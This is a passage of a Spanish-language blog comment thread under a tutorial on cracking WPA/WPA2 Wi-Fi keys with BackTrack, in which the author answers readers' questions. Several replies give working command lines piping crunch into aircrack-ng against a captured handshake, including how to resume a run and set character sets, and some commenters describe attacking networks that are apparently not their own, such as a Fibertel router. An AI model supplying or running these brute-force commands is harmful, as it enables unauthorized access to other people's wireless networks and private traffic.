    • Una vez que capturas el handshake paras el escaneo y comienzas con el proceso de fuerza bruta, que lleva mucho tiempo, a mi lo menos que me tardó fueron 5 horas, pero hay veces que ni siquiera llega a conseguir la clave.
      Saludos!

  30. Hola, primero que nada muy buen tuto!! de los mejores que he visto.
    Ahora la duda.
    Este metodo funciona siempre que la WPA tenga numeros, ya que si hablamos de numeros+letras+LETRAS MAYUSCULAS, no es posible, correcto?
    Siendo así…existe la posibilidad que nos detectara solo la parte que tenga numeros, bajando así considerablemente la cantidad de posibilidades?? ( ejemplo. clave : “EJEMplo1234″… este metodo nos decifraría “xxxxxxx1234″…logrando así saber la parte numérica de la clave??)
    Gracias y espero haberme explicado bien! :-)

    • No, no es posible, tiene que detectar la clave entera y puede estar formada por números y letras, yo simplemente pongo números para conseguir que el tiempo invertido en el proceso sea menos.

      Saludos!

  31. Antes que nada muchas gracias por compartir tus conocimientos DE VERDAD GRACIAS, ahora sin querer ser un “barbero” tengo algunas dudas que espero me puedas ayudar
    1.- Como puedo seguir capturando (lo que se va guardando en el archivo.CAP) por ejemplo si el router se desconecta o mi equipo se apaga y no se hasta que Passphrase se iva probando hasta el momento de la interrupcion??? puedo seguir usando el archivo.CAP para continuar hasta donde se quedo o tengo que hacer todo el proceso nuevamente? y es asi como se hace??
    2.- Si uso el usb live, y el archivo.CAP que va formando puede sobrepasar la capacidad del usb??? o puedo mover el archivo.CAP a otro lugar con mas espacio??? o como funciona el archivo.CAP?
    3.- hay alguna forma de conocer longitud de la Passphrase ??? para no perder tanto tiempo en instrucciones como: crunch 6 10 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w – ???

    Espero no molestar con tantas preguntas pero al igual que todos soy principiante en esto de las claves WPA/WPA2. Saludos y espero tu pronta respuesta.

    • Hola, empecemos:
      1. Si puedes seguir con el número que ibas comprobando tienes que escribir esto:
      ./crunch 8 8 -f charset.lst numeric -s 58475423 | ./aircrack-ng -a 2 micaptura.cap -e ESSID -b HANDSHAKE -w –
      La “opción” -s es tras la que tienes que introducir el número en el que ibas.
      2. El archivo .CAP no suele ocupar demasiado espacio, yo que tu lo dejaría en donde se crea.
      3. Que yo sepa no hay ninguna forma, y si tu conoces alguna, por favor publícalo aquí que es algo muy útil, porque como tu dices ahorraría mucho tiempo.

      Espero haberte ayudado. Saludos! :D

      • Muchas gracias por la pronta respuesta, pero aun me queda la duda de:
        1.- si se desconecta el router de donde capturo los paquetes, y crunch sigue probando claves, puede llegar un momento en que pruebe la Passphrase correcta, pero al estar apagado el router, crunch diga que es incorrecta???
        2.- esta tal ves sea una pregunta estupida pero cuando utilizo un diccionario, la Passphrase tiene que estar dentro del diccionario para que la obtenga cierto?? por ejemplo si usara un Passphrase: 78934JKJASHD o como funciona exactamente un diccionario?? es por eso que es mejor usar cruch no??
        y por ultimo
        3.- hay alguna forma de acelerar el proceso de cruch ?? bueno como todos yo solo tengo mi vieja laptop que corre a 1.9 Ghz con 2 de ram, alguna sugerencia que no sea comprar otra laptop?? jaja
        De antemano muchas gracias saludos amigo!
        P. D. con respecto a saber alguna forma de conocer la longitud de Passphrase no se nada jaja por eso te preguntaba tu eres el PRO!!

      • 1: No hace falta que el router siga conectado para conseguir la clave.
        2: Si, obviamente la palabra tiene que estar dentro del diccionario, si no nunca la encontraría.
        3: Puedes hacer overclock al procesador, pero la fuerza bruta consume muchos recursos y no te lo recomnedaría a no ser que sepas exactamente lo que haces. También hay un sistema en el que se puede usar el procesador de la gráfica es algo llamado “cuda” pero no se como funciona.

        Saludos!

  32. Muchas gracias por despejar mis dudas, no se que habra pasado con mi anterior entrada pero bueno, tengo algunas otras preguntas que hacerte espero no molestar:
    1.- como puedo reanudar el proceso para seguir probando las Passphrase con esta linea de comando ./crunch 8 8 -f charset.lst numeric -s 58475423 | ./aircrack-ng -a 2 micaptura.cap -e ESSID -b HANDSHAKE -w - solo abro la consola y lo ejecuto o tengo que hacer alguna parte del procedimiento
    2.- me queda la duda de si el modem del que estoy capturando los paquetes se apaga, si esto sucede y crunch sigue probando las Passphrase llegara un momento en que esta sea correcta pero al estar el modem apagado crunch diga que es incorrecta por que no la puede probar ??? o como funciona crunch??
    3.- si uso diccionarios y por ejemplo la Passphrase es p0r ejemplo “HJKH76895″ se supone que esta palabra tiene que estar en mi diccionario, cierto??? es por eso que probar con fuerza bruta con crunch es mejor o me equivoco?? o como funcionan los diccionarios exactamente???
    4.- hay alguna forma de acelerar el proceso con crunch?? mi laptop solo corre a 1.9 ghz con 2 en ram, alguna sugerencia??
    De antemano gracias, y espero no estar importunando con tantas preguntas, saludos!

    • 1: Tienes que completar el comando con tus opciones, el número de después de -s tiene que ser el que quieras que siga probando.

      Las otras preguntas ya te las contesté en el anterior comentario!

      Saludos! ;)

      • Muchas gracias amigo, perdona lo del doble comentario no fue intencional, pense que no se habia publicado la primera entrada en fin, te agradezco mucho que te hayas tomado el tiempo en contestar mis dudas, espero no haber estado molestando mucho, pocas veces te encuentras a personas que compartan sus conocimientos sin nada a cambio, gracias una vez mas, saludos!

  33. Hola Cârlol. Tengo una duda, a ver si me puedes ayudar.
    En el proceso que describes para saber la clave en una red WPA llego hasta obtener el handshake pero de ahí no paso…
    Tengo Backtrack 5r3 y trae el programa crunch de serie. ¿Puedo usarlo o hay que instalarlo desde fuera? y, si se puede usar desde el mismo backtrack, ¿cúal sería la secuencia para buscar una clave alfanumérica de por ejemplo 13 caracteres compuesto de letras y números?

    muchas gracias

    • Si tiene el crunch de serie, no es necesario que lo instales, un buen trabajo que te ahorras.
      La secuencia para lo que pides sería:
      crunch 13 13 0123456789abcdefghijklmnñopqrstuvwxyz | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP (suele ser /root/NombreArchivo.cap) -e default -b HANDSHAKE (aquí tienes que escribir la mac del router atacado) -w –

      Con tantos caracteres y tantas posibilidades es un trabajo muy, muy lento, a no ser que tengas un muy buen ordenador, es complicado que consigas burlar la seguridad de tu router.

      Saludos!

  34. Hola estuve viendo el tuto ya que me intereso eso de no sacar el pass sin diccionario muy bueno pero mi pregunta es si han modificado la pass que el proveedor te da por defecto por ejemplo 108e79fr5s67s por esta “mehagounadiario” es posible encontrarla con crunch perdon si ya as contestado esta pregunta etuve viendo los comentarios pero solo vi el de dora la exploradora que pusieron pero no me quedo claro de ante mano gracias

  35. hola muy buen tuto oye tengu una duda si el usuario a cambiado la contraseña que viene por defecto esta se puede conseguir con crunch ??
    sale amigo sigue asi con buenas explicaciones

  36. hola te escribo pidiendo ayuda porque la verdad ni yo me creo lo que paso.. desencripte la clave (wpa) de una red FIbertel con crunch pero a la hora de conectarme a la red me dice que la clave es erronea
    probe sacando de nuevo el handsake y con crunch empece a desencriptar de nuevo y me vuelve a dar la misma clave!!!! o sea que según crunch esa es la clave, pero el modem no me deja conectar
    alguna idea de porque el modem se estara poniendo la gorra?

  37. Aqui otra vez molestando con mas preguntas jajaja espero que no te enojes por ser tan pregunton pero siempre surgen dudas, espero y sea la ultima jaja
    1.- Solo quisiera saber si tendras un manual para poder configurar correctamente un maquina virtual (virtual box para ser exacto), bueno veras lo que intento es que la maquina se encargue mientras ocupo mi equipo para algo mas, podrias hacer algun post para poder configurar bien VB, lo que pasa es que cuando cuando quiero que reconozca mi tarjeta no lo hace (ese es mi principal problema), si me pudieras dar algun tutorial te lo agradeceria mucho
    2.- tendra alguna desventaja (aparte del consumo de recursos) el usar la maquina virtual en vez del equipo??
    espero me puedas ayudar y una vez mas gracias de antemano, saludos!

    • Hola! No es molestia, hay cientos de tutoriales de como instalar backtrack en una máquina virtual por internet, yo la verdad no lo he probado así, siempre lo he instalado o lo he usado desde un pendrive y lo que hacía era una vez que ponía a usar la fuerza bruta me conectaba a internet y usaba el ordenador como un linux cualquiera.
      Instalarlo en una máquina virtual es muy sencillo, el mayor problema es el de la tarjeta, tiene que cumplir ciertos requisitos, tiene que ser una tarjeta externa (por USB, ya que si no, no se podrá poner en modo monitor), además no la puede estar usando el sistema sobre el que estés corriendo la máquina virtual, porque no se podrá poner en modo monitor.

      Y como tu dices, quitando el problema de rendimiento, y teniendo 2 tarjetas de red (una para usar con el sistema base y otra para la máquina virtual) no tendrías ningún problema.

      Saludos!!

    Sebastian SAC dijo:

    Hola Cârlol !!!
    Primero Muchas Gracias. He leido BackTrack: Intalar + Wep + Wpa diccionarios + Wpa Crunch. Y se entiende todo claro.
    y me a funcionado (todavía no saco claves, pero es solo cosa de tiempo)
    Así que te felicito por tu aporte y de nuevo Muchas Gracias.

    Tengo 4 inquietudes:

    1.- El trabajar con diccionarios significa, que aircrack, chequea cada una de las palabras del diccionario y basta que la clave NO este en dicho diccionario
    y perdimos el tiempo?
    en cambio CRUNCH chequea caracter por caracter (Letra o Numero,etc)
    se demora más, pero es casi 100% efectivo?

    2.- Con Crunch para WPA2, da lo mismo el #DATA ?
    hay que esperar a que llegue a alguna cantidad o no?

    3.- Puedo ocupar Crunch para descifrar WEP ?
    y así no tener que esperar alguna cantidad de #DATA especifica ?

    4.- Por último, he usado WifiSlax y he obtenido 2 claves “Master Key”
    lo cual significa 64 caracteres.
    Hay alguna forma de obtener la clave “normal” ( 8 caracteres aprox)
    (aprovechando la “Master Key” para ahorrar tiempo, sin hacer todo desde cero)
    ya que esta clave tan larga “Master Key” no me funciona en algunos aparatos (por ser tan larga).

    Termino volviendo a agradecerte por tu ayuda y el tiempo que nos dedicas.
    Ya que es harto y lo haces con muy buena voluntad.

    Saludos!

    • Hola! Es un placer :)
      1. En absoluto, el diccionario si funciona así, la palabra que es la clave si tiene que estar dentro del diccionario, si no no hay manera de encontrarlo. Crunch lo que hace es generar esas palabras una a una (los números en este caso también se consideran palabras) y una vez que la comprueba, lo borra, por lo tanto evita el uso de un diccionario ya que estos ocupan muchísimo espacio.

      2. No es necesario alcanzar ningún data para las claves WPA2.

      3. Las claves WEP no se descifran por fuerza bruta, por lo tanto no sirve para nada el crunch.

      4. Generalmente estas calves tan largas son así porque están en hexadecimal, puedes buscar un conversor de herxadecimal a ASCII y tendrás tu clave “normal” como tu la llamas.

      Saludos! :)

        Sebastian SAC dijo:

        No me funciono con el conversor de herxadecimal a ASCII :(
        Dice que la clave esta mal…

        Y una Pregunta:
        Siempre se demora tanto en buscar la clave?

        Llevo 1.161 horas
        y 831 millones de claves testeadas.

        Me tiene loco, llevo 1 mes y medio :(

      • Si, generalmente tardan mucho, yo nunca dejé ninguna clave tanto tiempo.
        Tal vez algún carácter no esté en la que buscas.
        Saludos

  38. Hola que tal?

    ltengo un problema con el ultimo paso,
    cuando le envio al crunch los parametros y luego llamo al aircrack para definirle el essid y el ssid del pc conectado a la red me dice “check your essid”

    viendo los essid son los mismos.

    me puedes ayudar con esto porfavor :(

  39. Hola Cârlol, me gustaría saber si se puede crear, con crunch, un diccionario en el que los caracteres que le indiquemos, éstos no se repitan más de dos veces seguidas, es decir, que en la lista de contraseñas generadas no pudiese aparecer por ejemplo, algo así:
    a1F74hhhG2
    aquí la ‘h’ aparece 3 veces seguidas.
    Aunque sí me valdría que la clave fuese
    a1F74hh5Gh
    porque la ‘h’ aunque aparece tres veces, no está 3 veces seguida.

    Si se puede crear este tipo de diccionarios, ¿cómo habría que indicarlo para que todos los caracteres que pongamos lo cumplieran?

    muchas gracias

  40. Cârlol, acabo de preguntarte por la opción de crear un diccionario sin que tenga más de dos caracteres seguidos pero se me ha olvidado incluir la otra opción que quería añadir que es que en las claves generadas no aparezca 4 veces el mismo carácter, ejemplo:
    261ddawdD sí valdría
    261ddawdd no valdría

    gracias otra vez

  41. Te hago una pregunta una vez que encuentra la key , la guarda en algun lado ? como accedo a ese lugar donde la guardo ? gracias

Una respuesta en otro blog/artículo

  1. [...] Hace ya bastante tiempo os explicaba como podéis trabajar con fuerza bruta sin usar un diccionario, algo muy útil ya que los diccionarios suelen ocupar bastante. Más concretamente os lo explicaba en esta entrada. [...]

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos necesarios están marcados *

Escribe un comentario...

 

Puedes usar las siguientes etiquetas y atributos HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>